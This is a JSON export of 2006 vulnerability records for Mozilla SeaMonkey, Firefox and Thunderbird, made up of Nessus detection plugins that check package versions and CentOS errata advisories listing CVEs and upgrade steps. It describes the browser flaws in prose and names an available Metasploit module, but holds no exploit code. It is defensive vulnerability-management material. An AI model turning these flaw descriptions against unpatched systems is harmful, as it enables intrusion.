affected\nhost subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-44/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-45/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-46/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-47/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-48/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-49/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-50/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-51/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-52/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-53/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-54/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-55/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2006-56/\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to SeaMonkey 1.0.3 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/07/25\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:seamonkey\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"SeaMonkey/Version\");\n\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/SeaMonkey/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"SeaMonkey\");\n\nmozilla_check_version(installs:installs, product:'seamonkey', fix:'1.0.3', severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:06", "description": "The remote host is affected by the vulnerability described in GLSA-200608-02\n(Mozilla SeaMonkey: Multiple vulnerabilities)\n\n The following vulnerabilities have been reported:\n Benjamin Smedberg discovered that chrome URL's could be made to\n reference remote files.\n Developers in the Mozilla community\n looked for and fixed several crash bugs to improve the stability of\n Mozilla clients, which could lead to the execution of arbitrary code by\n a remote attacker.\n 'shutdown' reports that cross-site\n scripting (XSS) attacks could be performed using the construct\n XPCNativeWrapper(window).Function(...), which created a function that\n appeared to belong to the window in question even after it had been\n navigated to the target site.\n 'shutdown' reports that scripts\n granting the UniversalBrowserRead privilege can leverage that into the\n equivalent of the far more powerful UniversalXPConnect since they are\n allowed to 'read' into a privileged context.\n 'moz_bug_r_a4'\n reports that A malicious Proxy AutoConfig (PAC) server could serve a\n PAC script that can execute code with elevated privileges by setting\n the required FindProxyForURL function to the eval method on a\n privileged object that leaked into the PAC sandbox.\n 'moz_bug_r_a4' discovered that Named JavaScript functions have a\n parent object created using the standard Object() constructor\n (ECMA-specified behavior) and that this constructor can be redefined by\n script (also ECMA-specified behavior).\n Igor Bukanov and\n shutdown found additional places where an untimely garbage collection\n could delete a temporary object that was in active use.\n Georgi\n Guninski found potential integer overflow issues with long strings in\n the toSource() methods of the Object, Array and String objects as well\n as string function arguments.\n H. D. Moore reported a testcase\n that was able to trigger a race condition where JavaScript garbage\n collection deleted a temporary variable still being used in the\n creation of a new Function object.\n A malicious page can hijack\n native DOM methods on a document object in another domain, which will\n run the attacker's script when called by the victim page.\n Secunia Research has discovered a vulnerability which is caused due\n to an memory corruption error within the handling of simultaneously\n happening XPCOM events. This leads to use of a deleted timer\n object.\n An anonymous researcher for TippingPoint and the Zero\n Day Initiative showed that when used in a web page Java would reference\n properties of the window.navigator object as it started up.\n Thilo Girmann discovered that in certain circumstances a JavaScript\n reference to a frame or window was not properly cleared when the\n referenced content went away.\n \nImpact :\n\n A user can be enticed to open specially crafted URLs, visit webpages\n containing malicious JavaScript or execute a specially crafted script.\n These events could lead to the execution of arbitrary code, or the\n installation of malware on the user's computer.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2006-08-04T00:00:00", "title": "GLSA-200608-02 : Mozilla SeaMonkey: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "modified": "2006-08-04T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:seamonkey"], "id": "GENTOO_GLSA-200608-02.NASL", "href": "https://www.tenable.com/plugins/nessus/22144", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200608-02.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22144);\n script_version(\"1.19\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2006-3113\", \"CVE-2006-3677\", \"CVE-2006-3801\", \"CVE-2006-3802\", \"CVE-2006-3803\", \"CVE-2006-3804\", \"CVE-2006-3805\", \"CVE-2006-3806\", \"CVE-2006-3807\", \"CVE-2006-3808\", \"CVE-2006-3809\", \"CVE-2006-3810\", \"CVE-2006-3811\", \"CVE-2006-3812\");\n script_xref(name:\"GLSA\", value:\"200608-02\");\n\n script_name(english:\"GLSA-200608-02 : Mozilla SeaMonkey: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200608-02\n(Mozilla SeaMonkey: Multiple vulnerabilities)\n\n The following vulnerabilities have been reported:\n Benjamin Smedberg discovered that chrome URL's could be made to\n reference remote files.\n Developers in the Mozilla community\n looked for and fixed several crash bugs to improve the stability of\n Mozilla clients, which could lead to the execution of arbitrary code by\n a remote attacker.\n 'shutdown' reports that cross-site\n scripting (XSS) attacks could be performed using the construct\n XPCNativeWrapper(window).Function(...), which created a function that\n appeared to belong to the window in question even after it had been\n navigated to the target site.\n 'shutdown' reports that scripts\n granting the UniversalBrowserRead privilege can leverage that into the\n equivalent of the far more powerful UniversalXPConnect since they are\n allowed to 'read' into a privileged context.\n 'moz_bug_r_a4'\n reports that A malicious Proxy AutoConfig (PAC) server could serve a\n PAC script that can execute code with elevated privileges by setting\n the required FindProxyForURL function to the eval method on a\n privileged object that leaked into the PAC sandbox.\n 'moz_bug_r_a4' discovered that Named JavaScript functions have a\n parent object created using the standard Object() constructor\n (ECMA-specified behavior) and that this constructor can be redefined by\n script (also ECMA-specified behavior).\n Igor Bukanov and\n shutdown found additional places where an untimely garbage collection\n could delete a temporary object that was in active use.\n Georgi\n Guninski found potential integer overflow issues with long strings in\n the toSource() methods of the Object, Array and String objects as well\n as string function arguments.\n H. D. Moore reported a testcase\n that was able to trigger a race condition where JavaScript garbage\n collection deleted a temporary variable still being used in the\n creation of a new Function object.\n A malicious page can hijack\n native DOM methods on a document object in another domain, which will\n run the attacker's script when called by the victim page.\n Secunia Research has discovered a vulnerability which is caused due\n to an memory corruption error within the handling of simultaneously\n happening XPCOM events. This leads to use of a deleted timer\n object.\n An anonymous researcher for TippingPoint and the Zero\n Day Initiative showed that when used in a web page Java would reference\n properties of the window.navigator object as it started up.\n Thilo Girmann discovered that in certain circumstances a JavaScript\n reference to a frame or window was not properly cleared when the\n referenced content went away.\n \nImpact :\n\n A user can be enticed to open specially crafted URLs, visit webpages\n containing malicious JavaScript or execute a specially crafted script.\n These events could lead to the execution of arbitrary code, or the\n installation of malware on the user's computer.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200608-02\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Thunderbird users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-client/seamonkey-1.0.3'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Mozilla Suite/Firefox Navigator Object Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:seamonkey\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/08/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/08/04\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/07/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/seamonkey\", unaffected:make_list(\"ge 1.0.3\"), vulnerable:make_list(\"lt 1.0.3\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Mozilla SeaMonkey\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "centos": [{"lastseen": "2019-12-20T18:26:07", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-3677", "CVE-2006-3804", "CVE-2006-3810", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-3113", "CVE-2006-3805", "CVE-2006-3808", "CVE-2006-3802"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0608\n\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\r\nclient, IRC chat client, and HTML editor.\r\n\r\nSeveral flaws were found in the way SeaMonkey processed certain javascript\r\nactions. A malicious web page could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3807,\r\nCVE-2006-3809, CVE-2006-3812)\r\n\r\nSeveral denial of service flaws were found in the way SeaMonkey processed\r\ncertain web content. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running SeaMonkey.\r\n(CVE-2006-3801, CVE-2006-3677, CVE-2006-3113, CVE-2006-3803, CVE-2006-3805,\r\nCVE-2006-3806, CVE-2006-3811)\r\n\r\nA buffer overflow flaw was found in the way SeaMonkey Messenger displayed\r\nmalformed inline vcard attachments. If a victim viewed an email message\r\ncontaining a carefully crafted vcard, it was possible to execute arbitrary\r\ncode as the user running SeaMonkey Messenger. (CVE-2006-3804)\r\n\r\nSeveral flaws were found in the way SeaMonkey processed certain javascript\r\nactions. A malicious web page could conduct a cross-site scripting attack\r\nor steal sensitive information (such as cookies owned by other domains).\r\n(CVE-2006-3802, CVE-2006-3810)\r\n\r\nA flaw was found in the way SeaMonkey processed Proxy AutoConfig scripts. A\r\nmalicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3808)\r\n\r\nUsers of SeaMonkey are advised to upgrade to this update, which contains\r\nSeaMonkey version 1.0.3 that corrects these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025153.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025160.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025161.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025162.html\n\n**Affected packages:**\nseamonkey\nseamonkey-chat\nseamonkey-devel\nseamonkey-dom-inspector\nseamonkey-js-debugger\nseamonkey-mail\nseamonkey-nspr\nseamonkey-nspr-devel\nseamonkey-nss\nseamonkey-nss-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0608.html", "edition": 3, "modified": "2006-08-05T21:06:29", "published": "2006-08-04T20:56:41", "href": "http://lists.centos.org/pipermail/centos-announce/2006-August/025153.html", "id": "CESA-2006:0608", "title": "seamonkey security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-15T11:38:01", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-2780", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-2784", "CVE-2006-3677", "CVE-2006-2785", "CVE-2006-2776", "CVE-2006-2778", "CVE-2006-3810", "CVE-2006-2779", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-2786", "CVE-2006-3113", "CVE-2006-2783", "CVE-2006-3805", "CVE-2006-2788", "CVE-2006-2787", "CVE-2006-3808", "CVE-2006-2782", "CVE-2006-3802"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0610\n\n\nMozilla Firefox is an open source Web browser.\r\n\r\nThe Mozilla Foundation has discontinued support for the Mozilla Firefox\r\n1.0 branch. This update deprecates the Mozilla Firefox 1.0 branch in\r\nRed Hat Enterprise Linux 4 in favor of the supported Mozilla Firefox\r\n1.5 branch.\r\n\r\nThis update also resolves a number of outstanding Firefox security issues:\r\n\r\nSeveral flaws were found in the way Firefox processed certain javascript\r\nactions. A malicious web page could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-2776,\r\nCVE-2006-2784, CVE-2006-2785, CVE-2006-2787, CVE-2006-3807, CVE-2006-3809,\r\nCVE-2006-3812)\r\n\r\nSeveral denial of service flaws were found in the way Firefox processed\r\ncertain web content. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running Firefox.\r\n(CVE-2006-2779, CVE-2006-2780, CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\r\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\r\n\r\nA cross-site scripting flaw was found in the way Firefox processed\r\nUnicode Byte-Order-Mark (BOM) markers in UTF-8 web pages. A malicious web\r\npage could execute a script within the browser that a web input sanitizer\r\ncould miss due to a malformed \"script\" tag. (CVE-2006-2783)\r\n\r\nSeveral flaws were found in the way Firefox processed certain javascript\r\nactions. A malicious web page could conduct a cross-site scripting attack\r\nor steal sensitive information (such as cookies owned by other domains).\r\n(CVE-2006-3802, CVE-2006-3810)\r\n\r\nA form file upload flaw was found in the way Firefox handled javascript\r\ninput object mutation. A malicious web page could upload an arbitrary local\r\nfile at form submission time without user interaction. (CVE-2006-2782)\r\n\r\nA denial of service flaw was found in the way Firefox called the\r\ncrypto.signText() javascript function. A malicious web page could crash the\r\nbrowser if the victim had a client certificate loaded. (CVE-2006-2778)\r\n\r\nTwo HTTP response smuggling flaws were found in the way Firefox processed\r\ncertain invalid HTTP response headers. A malicious web site could return\r\nspecially crafted HTTP response headers which may bypass HTTP proxy\r\nrestrictions. (CVE-2006-2786)\r\n\r\nA flaw was found in the way Firefox processed Proxy AutoConfig scripts. A\r\nmalicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3808)\r\n\r\nA double free flaw was found in the way the nsIX509::getRawDER method was\r\ncalled. If a victim visited a carefully crafted web page, it was possible\r\nto execute arbitrary code as the user running Firefox. (CVE-2006-2788)\r\n\r\nUsers of Firefox are advised to upgrade to this update, which contains\r\nFirefox version 1.5.0.5 that corrects these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025125.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-July/025109.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-July/025110.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-July/025121.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-July/025122.html\n\n**Affected packages:**\nfirefox\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0610.html", "edition": 7, "modified": "2006-08-01T01:49:26", "published": "2006-07-29T11:51:13", "href": "http://lists.centos.org/pipermail/centos-announce/2006-July/025109.html", "id": "CESA-2006:0610", "title": "firefox security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-08-15T11:37:25", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-2780", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-2784", "CVE-2006-3677", "CVE-2006-2785", "CVE-2006-2776", "CVE-2006-3804", "CVE-2006-2778", "CVE-2006-3810", "CVE-2006-2779", "CVE-2006-2781", "CVE-2006-3801", "CVE-2006-2786", "CVE-2006-3113", "CVE-2006-2783", "CVE-2006-3805", "CVE-2006-2788", "CVE-2006-2787", "CVE-2006-3808", "CVE-2006-2782", "CVE-2006-3802"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0611\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\r\n\r\nThe Mozilla Foundation has discontinued support for the Mozilla Thunderbird\r\n1.0 branch. This update deprecates the Mozilla Thunderbird 1.0 branch in\r\nRed Hat Enterprise Linux 4 in favor of the supported Mozilla Thunderbird\r\n1.5 branch.\r\n\r\nThis update also resolves a number of outstanding Thunderbird security issues:\r\n\r\nSeveral flaws were found in the way Thunderbird processed certain\r\njavascript actions. A malicious mail message could execute arbitrary\r\njavascript instructions with the permissions of \"chrome\", allowing the page\r\nto steal sensitive information or install browser malware. (CVE-2006-2776,\r\nCVE-2006-2784, CVE-2006-2785, CVE-2006-2787, CVE-2006-3807, CVE-2006-3809)\r\n\r\nSeveral denial of service flaws were found in the way Thunderbird processed\r\ncertain mail messages. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running Thunderbird.\r\n(CVE-2006-2779, CVE-2006-2780, CVE-2006-3801, CVE-2006-3677,\r\nCVE-2006-3113, CVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\r\n\r\nSeveral flaws were found in the way Thunderbird processed certain\r\njavascript actions. A malicious mail message could conduct a cross-site\r\nscripting attack or steal sensitive information (such as cookies owned by\r\nother domains). (CVE-2006-3802, CVE-2006-3810)\r\n\r\nA form file upload flaw was found in the way Thunderbird handled javascript\r\ninput object mutation. A malicious mail message could upload an arbitrary\r\nlocal file at form submission time without user interaction. (CVE-2006-2782)\r\n\r\nA denial of service flaw was found in the way Thunderbird called the\r\ncrypto.signText() javascript function. A malicious mail message could crash\r\nthe browser if the victim had a client certificate loaded. (CVE-2006-2778)\r\n\r\nA flaw was found in the way Thunderbird processed Proxy AutoConfig scripts.\r\nA malicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install client malware. (CVE-2006-3808)\r\n\r\nNote: Please note that JavaScript support is disabled by default in\r\nThunderbird. The above issues are not exploitable with JavaScript disabled. \r\n\r\nTwo flaws were found in the way Thunderbird displayed malformed inline\r\nvcard attachments. If a victim viewed an email message containing a\r\ncarefully crafted vcard it was possible to execute arbitrary code as the\r\nuser running Thunderbird. (CVE-2006-2781, CVE-2006-3804)\r\n\r\nA cross site scripting flaw was found in the way Thunderbird processed\r\nUnicode Byte-order-Mark (BOM) markers in UTF-8 mail messages. A malicious\r\nweb page could execute a script within the browser that a web input\r\nsanitizer could miss due to a malformed \"script\" tag. (CVE-2006-2783)\r\n\r\nTwo HTTP response smuggling flaws were found in the way Thunderbird\r\nprocessed certain invalid HTTP response headers. A malicious web site could\r\nreturn specially crafted HTTP response headers which may bypass HTTP proxy\r\nrestrictions. (CVE-2006-2786)\r\n\r\nA double free flaw was found in the way the nsIX509::getRawDER method was\r\ncalled. If a victim visited a carefully crafted web page, it was possible\r\nto crash Thunderbird. (CVE-2006-2788)\r\n\r\nUsers of Thunderbird are advised to upgrade to this update, which contains\r\nThunderbird version 1.5.0.5 that corrects these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-August/025128.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-July/025111.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-July/025112.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-July/025123.html\nhttp://lists.centos.org/pipermail/centos-announce/2006-July/025124.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2006-0611.html", "edition": 7, "modified": "2006-08-01T12:35:08", "published": "2006-07-29T11:51:27", "href": "http://lists.centos.org/pipermail/centos-announce/2006-July/025111.html", "id": "CESA-2006:0611", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:27:59", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-2780", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-2784", "CVE-2006-3677", "CVE-2006-2785", "CVE-2006-2776", "CVE-2006-3804", "CVE-2006-2778", "CVE-2006-3810", "CVE-2006-2779", "CVE-2006-2781", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-2786", "CVE-2006-3113", "CVE-2006-2783", "CVE-2006-3805", "CVE-2006-2788", "CVE-2006-2787", "CVE-2006-3808", "CVE-2006-2782", "CVE-2006-3802"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0594-02\n\n\nSeaMonkey is an open source Web browser, advanced email and newsgroup\r\nclient, IRC chat client, and HTML editor.\r\n\r\nThe Mozilla Foundation has discontinued support for the Mozilla Suite. This\r\nupdate deprecates the Mozilla Suite in Red Hat Enterprise Linux 2.1 in\r\nfavor of the supported SeaMonkey Suite.\r\n\r\nThis update also resolves a number of outstanding Mozilla security issues:\r\n\r\nSeveral flaws were found in the way SeaMonkey processed certain javascript\r\nactions. A malicious web page could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-2776,\r\nCVE-2006-2784, CVE-2006-2785, CVE-2006-2787, CVE-2006-3807, CVE-2006-3809,\r\nCVE-2006-3812)\r\n\r\nSeveral denial of service flaws were found in the way SeaMonkey processed\r\ncertain web content. A malicious web page could crash the browser or\r\npossibly execute arbitrary code as the user running SeaMonkey.\r\n(CVE-2006-2779, CVE-2006-2780, CVE-2006-3801, CVE-2006-3677, CVE-2006-3113,\r\nCVE-2006-3803, CVE-2006-3805, CVE-2006-3806, CVE-2006-3811)\r\n\r\nTwo flaws were found in the way SeaMonkey Messenger displayed malformed\r\ninline vcard attachments. If a victim viewed an email message containing\r\na carefully crafted vcard it was possible to execute arbitrary code as the\r\nuser running SeaMonkey Messenger. (CVE-2006-2781, CVE-2006-3804)\r\n\r\nA cross-site scripting flaw was found in the way SeaMonkey processed\r\nUnicode Byte-Order-Mark (BOM) markers in UTF-8 web pages. A malicious web\r\npage could execute a script within the browser that a web input sanitizer\r\ncould miss due to a malformed \"script\" tag. (CVE-2006-2783)\r\n\r\nSeveral flaws were found in the way SeaMonkey processed certain javascript\r\nactions. A malicious web page could conduct a cross-site scripting attack\r\nor steal sensitive information (such as cookies owned by other domains).\r\n(CVE-2006-3802, CVE-2006-3810)\r\n\r\nA form file upload flaw was found in the way SeaMonkey handled javascript\r\ninput object mutation. A malicious web page could upload an arbitrary local\r\nfile at form submission time without user interaction. (CVE-2006-2782)\r\n\r\nA denial of service flaw was found in the way SeaMonkey called the\r\ncrypto.signText() javascript function. A malicious web page could crash the\r\nbrowser if the victim had a client certificate loaded. (CVE-2006-2778)\r\n\r\nTwo HTTP response smuggling flaws were found in the way SeaMonkey processed\r\ncertain invalid HTTP response headers. A malicious web site could return\r\nspecially crafted HTTP response headers which may bypass HTTP proxy\r\nrestrictions. (CVE-2006-2786)\r\n\r\nA flaw was found in the way SeaMonkey processed Proxy AutoConfig scripts. A\r\nmalicious Proxy AutoConfig server could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. (CVE-2006-3808)\r\n\r\nA double free flaw was found in the way the nsIX509::getRawDER method was\r\ncalled. If a victim visited a carefully crafted web page it was possible to\r\nexecute arbitrary code as the user running SeaMonkey. (CVE-2006-2788)\r\n\r\nUsers of Mozilla are advised to upgrade to this update, which contains\r\nSeaMonkey version 1.0.3 that corrects these issues.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2006-September/025226.html\n\n**Affected packages:**\nseamonkey\nseamonkey-chat\nseamonkey-devel\nseamonkey-dom-inspector\nseamonkey-js-debugger\nseamonkey-mail\nseamonkey-nspr\nseamonkey-nspr-devel\nseamonkey-nss\nseamonkey-nss-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/rh21as-errata.html", "edition": 5, "modified": "2006-09-05T00:01:38", "published": "2006-09-05T00:01:38", "href": "http://lists.centos.org/pipermail/centos-announce/2006-September/025226.html", "id": "CESA-2006:0594-02", "title": "seamonkey security update", "type": "centos", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:24:34", "bulletinFamily": "unix", "cvelist": ["CVE-2006-3806", "CVE-2006-3809", "CVE-2006-3803", "CVE-2006-2780", "CVE-2006-3807", "CVE-2006-3811", "CVE-2006-2784", "CVE-2006-3677", "CVE-2006-2785", "CVE-2006-2776", "CVE-2006-3804", "CVE-2006-2778", "CVE-2006-3810", "CVE-2006-2779", "CVE-2006-2781", "CVE-2006-3801", "CVE-2006-3812", "CVE-2006-2786", "CVE-2006-3113", "CVE-2006-2783", "CVE-2006-3805", "CVE-2006-2788", "CVE-2006-2787", "CVE-2006-3808", "CVE-2006-2782", "CVE-2006-3802"], "description": "**CentOS Errata and Security Advisory** CESA-2006:0609\n\n\nSeamonkey is an open source Web browser, advanced email and newsgroup\r\nclient, IRC chat client, and HTML editor.\r\n\r\nThe Mozilla Foundation has discontinued support for the Mozilla Suite. This\r\nupdate deprecates the Mozilla Suite in Red Hat Enterprise Linux 4 in\r\nfavor of the supported Seamonkey Suite.\r\n\r\nThis update also resolves a number of outstanding Mozilla security issues:\r\n\r\nSeveral flaws were found in the way Seamonkey processed certain javascript\r\nactions. A malicious web page could execute arbitrary javascript\r\ninstructions with the permissions of \"chrome\", allowing the page to steal\r\nsensitive information or install browser malware. 